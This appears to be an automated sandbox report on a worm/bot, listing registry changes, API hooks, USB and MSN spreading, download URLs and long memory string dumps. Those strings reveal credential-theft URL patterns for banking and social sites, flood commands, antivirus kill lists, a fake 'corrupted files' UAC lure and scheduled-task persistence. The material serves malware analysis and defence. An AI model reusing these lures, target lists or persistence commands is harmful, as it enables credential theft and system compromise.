"Seed" = "DB 7F A2 26 03 06 B3 9E FA 33 39 8E 48 99 35 E2"
[HKCU\Software\Win7zip]
"uuid" = "6F 9A 57 53 0A 29 1B 4E BE 6B 6A D9 6F E7 5E 1E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CG1]
"HAL" = "05 EE 00 00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lgzovpzqe.exe]
"DisableExceptionChainValidation" = ""
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CG1]
"BID" = "20 00 08 00 13 00 06 00 DE 07 00 00 14 00 88 FF"
Dropped PE files
| MD5 | File path |
|---|---|
| 830da209ecc9fb980d35ba8d2e61bb27 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Worm installs the following user-mode hooks in WININET.dll:
HttpSendRequestW
InternetWriteFile
HttpSendRequestA
The Worm installs the following user-mode hooks in DNSAPI.dll:
DnsQuery_A
DnsQuery_W
The Worm installs the following user-mode hooks in WS2_32.dll:
send
GetAddrInfoW
The Worm installs the following user-mode hooks in kernel32.dll:
MoveFileA
CopyFileW
CopyFileA
MoveFileW
CreateFileW
CreateFileA
The Worm installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.
A worm can spread its copies through the MSN Messanger.
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.10.0
Legal Copyright: Copyright (c) 2000-2004 Oleh Yuschuk
Legal Trademarks:
Original Filename:
Internal Name: OllyDbg
File Version: 1.0.10.0
File Description: OllyDbg, 32-bit analysing debugger
Comments:
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 40083 | 40448 | 4.52037 | 3968259063d25d635df3bc4a5234b1b8 |
| .rdata | 45056 | 14292 | 14336 | 3.63511 | 2ddde80c1d07fe980d71d92932333fc0 |
| .data | 61440 | 14180 | 6656 | 4.27116 | b2d13cdfd2b27a256886545f3f3b11c7 |
| .rsrc | 77824 | 35156 | 35328 | 4.78522 | 92d80d4490430c356f5bb6edf9e29c21 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://dl.dqwjnewkwefewamail.com/bet.exe | |
| hxxp://dl.dqwjnewkwefewamail.com/ng.exe |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
GET /bet.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.dqwjnewkwefewamail.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 19 Jun 2014 16:43:30 GMT
Server: Apache/2.2.27 (Amazon)
Last-Modified: Thu, 19 Jun 2014 14:49:25 GMT
ETag: "20f74-4c200-4fc317ba75165"
Accept-Ranges: bytes
Content-Length: 311808
Connection: close
Content-Type: application/octet-streamMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........}..........
....;........d.......d?......d).........u....d9......N.......N>....
..N;.....Rich....................PE..L......S.........................
....#....... ....@....................................................
.....................L...<.........................................
..............................@............ ..........................
.....text............................... ..`.rdata...z... ...|........
..........@[email protected]......."[email protected]...........
....................@..@..............................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U....0.E......E.....
.E.Pjd.4.......E..}..u.h`"A..>..........>....E.3..u...u..M.Q.U.R
h."A............E.P.M.Qh."A..........U.Rh.....E.P.e.......E..M.Q......
...U.R.E.Ph.............E..}..u..........M.Q.U.Rh.....E.P.........E..}
..u..........M.Q.D......j.h."A.h."A.h."A.h."A.j...."A.......E...A....#
A..]....#A..].....E...$....E...$.E.......].....E...$....E...$....E...$
h."A..l.......U.3...]...............U......E...$....E...$.,......]..U.
..............................................................x...<<< skipped >>>
GET /ng.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.dqwjnewkwefewamail.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 19 Jun 2014 16:45:16 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Thu, 19 Jun 2014 13:46:51 GMT
ETag: "603d8-37a00-4fc309be5c8c0"
Accept-Ranges: bytes
Content-Length: 227840
Connection: close
Content-Type: application/octet-streamMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........}..........
....;........d.......d?......d).........s....d9......N.......N>....
..N;.....Rich....................PE..L......S.....................n...
....#....... ....@....................................................
.....................<...<.......`..............................
.................................@............ .......................
........text............................... ..`.rdata...y... ...z.....
.............@[email protected]......."[email protected]...`....
.......................@..@...........................................
......................................................................
......................................................................
......................................................................
......................................................................
.....................................................U....0.E......E..
....E.Pjd.4.......E..}..u.hP"A..>..........>....E.3..u...u..M.Q.
U.Rht"A............E.P.M.Qh."A..........U.Rh.....E.P.e.......E..M.Q...
......U.R.E.Ph.............E..}..u..........M.Q.U.Rh.....E.P.........E
..}..u..........M.Q.D......j.hq"A.hr"A.hs"A.h."A.j...."A.......E...A..
..#A..]...."A..].....E...$....E...$.E.......].....E...$....E...$....E.
..$h."A..l.......U.3...]...............U......E...$....E...$.,......].
.U...............................................................x<<< skipped >>>
The Worm connects to the servers at the folowing location(s):
.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512
svchost.exe_884_rwx_00090000_00029000:
.text
`.data
.rsrc
@.reloc
*windows defender*
*windowsupdate*
*drweb*
dwwin.exe
kernel32.dll
iphlpapi.dll
GetExtendedTcpTable
GetOwnerModuleFromTcpEntry
%systemroot%
%programfiles%\Common Files\*\*.exe
%appdata%\Identities\*.exe
%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe
ole32.dll
/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"
/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"
%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe
%SystemRoot%\system32\SHELL32.dll
%s\c731200
%s\%s
%s\%s.lnk
Windows_Shared_Mutex_231_c000100
ntdll.dll
\ScreenSaverPro.scr
\temp.bin
user32.dll
advapi32.dll
shell32.dll
urlmon.dll
wininet.dll
gdi32.dll
rpcrt4.dll
netapi32.dll
*.exe
.gonewiththewings
*.gonewiththewings
WinExec
URLDownloadToFileA
http://www.google.com
\calc.exe
\Reader_sl.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
notepad.exe
\notepad.exe
\svchost.exe
WindowsId
Identities\%s
%s\%s\%s.exe
:Zone.Identifier
.quarantined
"%s" -shell
"%s" -bind
userinit.exe
explorer.exe
Windows critical error, require reboot
Windows Update
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
GetProcessHeap
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyA
RegEnumKeyA
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
SetTcpEntry
SHLWAPI.dll
RPCRT4.dll
NETAPI32.dll
DNSAPI.dll
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\WindowsId Manager Reader
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
WindowsMark
m1xg.org
mxxtxxt.biz
meob.me
%System%\notepad.exe
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0A
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
%s_%d
-%sMutex
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
httpi
dnsapi.dll
http://%s/%s
http://%s/
POST /23s
[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
URLDownloadToFileW
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
Secur32.dll
ShellExecuteA
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
WS2_32.dll
MSVCRT.dll
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
RegNotifyChangeKeyValue
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
http://api.wipmania.com/
\\.\pipe\x_ipc
7 767<7~7
8*808;8~8
{A5DCBF10-6530-11D2-901F-00C04FB951ED}shlwapi.dll
crypt32.dll
wtsapi32.dll
samcli.dll
netutils.dll
userenv.dll
WindowsSecondaryDesktop
\charmap.exe
\Windows Media Player\wmprph.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
Aadvapi32.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
svchost.exe_884_rwx_000C0000_00027000:
.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
PSSVSSh
RPVSSh
PSSh(
PSSh#
PSSh'
PSSh&
PSSh*
9p.uV
svchost.exe_884_rwx_000E8000_00072000:
Opera/9.00 (Windows NT 5.1; U; en)
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)
Opera 9.4 (Windows NT 6.1; U; en)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)
SbieDll.dll
Software\Classes\CLSID\%s\X
Software\Classes\CLSID\%s\X\%s
0xX
SB:0xX
G:%s_0xX_%c:%s_v1$
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
IEXPLORE.EXE
IE.HTTP
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTPS
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
IE.AssocFile.HTM
HTTP\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s
Psapi.dll
%s\%s
Software\Adobe\Acrobat Reader\%s\Privileged
mscoree.dll
HARDWARE\DESCRIPTION\System\CentralProcessor\%u
SOFTWARE\Microsoft\Windows NT\CurrentVersion
nspr4.dll
nss3.dll
Urlmon.dll
URLDownloadToFileW
Netapi32.dll
76487-640-1457236-23837
76487-337-8429955-22614
76487-644-3177037-23510
76497-640-6308873-23835
55274-640-2673064-23950
76487-640-8834005-23195
76487-640-0716662-23535
76487-644-8648466-23106
00426-293-8170032-85146
76487-341-5883812-22420
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup
{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}snxhk.dll
comctl32.dll
ZwSetValueKey
ZwDeleteValueKey
SOFTWARE\%s
update.microsoft.com
microsoft.com
windowsupdate.microsoft.com
JOIN
PRIVMSG
.rdata
cmd_option.%s
/c %s
cmd.exe
msvcrt.dll
--x-x-x-xx
Content-Type: multipart/form-data; boundary=x-x-x-xx
Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"
%s?action=up&g=%s
xul.dll
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
?pid=%d
?page=%d
?id=%u
%s=%u&%s=%s
%s=%s&%s=%u
&%s=%s
&%s%u=
&%s%hu=
&%s=_%u
%d|%s|%s|%s
.info
httpget
GET /%s HTTP/1.1
Host: %s
Content-Length: %d
Accept: %s
Accept-Language: %s
Accept-Charset: %s
Accept-Encoding: %s
User-Agent: %s
Referer: %s
Connection: %s
http://
iexplore.exe
firefox.exe
tbb-firefox.exe
%s:%hu
windowsupdate
SSH2_MSG_KEXINIT
SSH2_MSG_DISCONNECT
SSH2_MSG_USERAUTH_SUCCESS
http://%s%s/image.php?id=%s
TaskDialogIndirect
http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535
ÐxX
ntdll.dll
kernel32.dll
secur32.dll
crypt32.dll
user32.dll
advapi32.dll
wininet.dll
shell32.dll
shlwapi.dll
ole32.dll
version.dll
sfc.dll
dnsapi.dll
ws2_32.dll
8"808]9|9
9%9 919<9
=(=/=6==={=4 4?4^4}4
6o6g6r6w6
9 9$9(90949
.text
`.rdata
@.data
.rsrc
This pointer, %d, is aligned on %d
This pointer, %d, is not aligned on %d
%f, %f and %f form a right-angled triangle.
Invalid parameter passed to C runtime function.
?#%X.y
%S#[k
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
ShellExecuteA
SHELL32.dll
GetCPInfo
GetWindowsDirectoryA
CreatePipe
GetWindowsDirectoryW
GetConsoleOutputCP
KERNEL32.dll
.VI3xqr
zcÁ
Udp?iw0
/#"%f
P.oUw
B%Su[
Rkka.by
.dYi'
p.Cvq
.EU{%D ;0.Bx%s)$Oi.zC:*@7WeBld0%Fr. -.kN.kal"f.xKKSoftware\Classes\CLSID\%SG:%S_0xXchrome.exeopera.exesafari.exemaxthon.exe:Mozilla\Firefox\Profilescookies.sqlite%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*%s\winsxs\%s\comctl32.dllSYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s%s:*:Enabledavcuf32.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Runprstrui.exeWindows DefenderMpClient.dllWindows Defender\MSASCui.exeMpSvc.dllmsseces.exeMsMpEng.exeMSASCui.exeMpAsDesc.dllMsMpLics.dllavgui.exeavgidsagent.exeavgwdsvc.exeavgdiagex.exeavgmfapx.exeavgupd.exeavgcfgex.exeavgnt.exeavguard.exeavshadow.exeavcenter.exeupdate.dllupdaterc.dllusrreq.execcsvchst.exesymerr.exeNIS.exeNAV.exenavw32.exeavastui.exeAvastEmUpdate.exeashUpd.exeWRSA.exezatray.exeForceField.exeupdating.dllfshoster32.exefsaua.dllPSUNMain.exePSUAService.exePSANHost.exePSUNScan.dllepavjobs.exeAVENGINE.exeUpgrader.exeadaware.exeBullGuard.exe.manifestBullGuardUpdate.exeBullGuard.exeBullGuardScanner.exeBullGuardBhvScanner.exeBullGuardUpdate2.exeBgScan.exeBgScanEngine.dll.manifestupdater.exeBackup\RSD\RSSetup\updater.exeRsTray.exeRavMonD.exeRsMgrSvc.exersmain.exeRsScan.dllRsTray.dllmbamgui.exembam.exepctsGui.exepctsAuxs.exepctsSvc.exeUpdate.exeUpdateHlpr.dllDefinitions\vcore.dllsbamui.exeSBAMTray.exeupdater_client_mod.dllFProtTray.exeFPWin.exescf.datALUpdate.exeupdate_tmp.exearcaclean.exeBavUpdater.exercfp.exeCLPSLA.exeop_mon.exeniu.exeK7TSUpdT.exesguardxup.execcupdate.execaupdate.dlla2guard.exea2start.exea2service.exeAVKTray.exeGDSC.exeAVK.exeGDFirewallTray.exeBka.exeBLuPro.exeBkavSystemServer.exeBkavService.exeLiveUpdate.dllLiveConnect.dllBaseFile\Bkav\LiveUpdate.dllV3Lite.exeASDSvc.exeautoup.exedownloader.exe%s.configupdatesrv.exeupdatemgr.dllegui.exeekrn.exex86\ekrn.exeuWinMgr.execoreServiceShell.exeuiSeAgnt.exeuiWatchDog.exeplugins\plugUpdater.dllUiFrmwrk\uiUpdateTray.execoreFrameworkHost.exemcagent.exeMcSvHost.exeMcUICnt.exeMcPvTray.exemcui_exemcpltui_exemcshell.exemcupdmgr.exemcupdate.exemcshield.exemcupdui.dllMcAPExe.exe.configImage File Execution Options\%sSYSTEM\CurrentControlSet\services\%s%c:\ntusbdriver.sys%c:\*p.exe%c:\%sp.exe%WinDir%\explorer.exe/C start /d. %s&"%s"%COMSPEC%%WinDir%\system32\shell32.dll%c:\%s.lnkVisthAux.exeexplorer.exet.minecraftWorks! PID: %d, Name: %scmdvirth%s%s\Xtcp://svchost.execsrss.exelsass.exesmss.exewscript.execscript.exevbc.exerundll32.exeregsvr32.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Runwinlogon.exeservices.exe%s\x.lnkSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%sdesktop.iniSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows NT\CurrentVersion\Windowswintrust.dllchrome.dllApplications\iexplore.exe\shell\open\command%s_xxx.zipNavw32.exeSysInspector.exeavscan.exemfefire.exewuauclt.exeWerFault.exelFileZilla\sitemanager.xmlportSites.datQuick.dat%s\3\%s%s\4\%sspoolsv.exesteam.exeskype.exeorigin.exedwm.exetapi3.dll/C copy "%s" "%s"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunWindows Update Service"%s" /%sSoftware\Microsoft\Windows\CurrentVersion\RunOnce/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHESTschtasks.exe/DELETE /TN "Windows Update Check - 0xX" /F\Windows\Explorer.exeLow_X%s.manifestPendingFileRenameOperations%s\XWindows\CurrentVersion\RunCurrentVersion\WindowsWindows NT\CurrentVersion\Image File Execution Options\%sWindows has encountered a corrupted folder on your hard driveMultiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.Corrupted folder: %sCorrupted file count: %d%s/c start "" "%s" /%s "%s"shell32,ShellExec_RunDLL "%s" /%s "%s"You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.Windows 3.1 Update Service%s:Zone.Identifier%s\X.pifKERNEL32.DLLKERNELBASE.DLLkernelbase.dlloSome operation could not be performed because the system is out of resources. Close some windows and try again.Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\ExplorerUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.Description: BThe "Portable Network Graphics" image contains an invalid palette.The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'%s parameter cannot be nil#Feature not supported by this styleStyle '%s' is not registered"Cannot unregister the system styleOLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parametersFailed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedLogin"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or laterButton%dRadioButton%dUnable to load style '%s'Unable to load styles: %sStyle '%s' already registered#Style class '%s' already registeredStyle '%s' not foundStyle class '%s' not foundAll Clipboard does not support IconsCannot open clipboard: %sText exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array&PasswordValue must be between %d and %d%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parentError creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collectionScan line index out of range!Cannot change the size of an 